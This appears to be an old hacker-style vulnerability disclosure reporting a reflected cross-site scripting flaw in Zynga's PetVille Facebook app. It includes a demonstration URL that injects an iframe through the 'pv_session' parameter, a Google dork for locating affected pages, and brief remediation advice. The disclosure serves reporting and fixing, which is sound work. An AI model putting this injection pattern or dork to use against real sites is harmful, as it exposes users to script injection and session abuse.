_______  ________________ __    _____________
_______ \   _  \ \   _  \______  \  | _/_   \______  \         __  _  __
\_  __ \/  /_\  \/  /_\  \  /    /  |/ /|   |   /    /  ______ \ \/ \/ /
 |  | \/\  \_/   \  \_/   \/    /|    < |   |  /    /  /_____/  \     /
 |__|    \_____  /\_____  /____/ |__|_ \|___| /____/             \/\_/
               \/       \/            \/


-------------------------------------------------------------------------------------------------------------------------------------------------

    TITLE: Type-0 XSS bug in ZYNGA PETVILLE(facebook apps)
    vendor: www.apps.facebook.com/petvillegame/**[]
  Author: r007k17-w a.k.a Raghavendra Karthik.D
  Email:  n4gb07@gmail.com
  My blog: http://shadowrootkit.wordpress.com/
  Google Dork: Copyright 2010 Zynga Game Network Inc
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

DEMO: http://apps.facebook.com/petvillegame/money.php?ref=&pv_session="><iframe
src="http://www.google.com"></iframe>
SUG: HTML encoding, escaping special characters,Input sanitization.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

gr33t1ngs to s1d3-3ff3cts and all my friends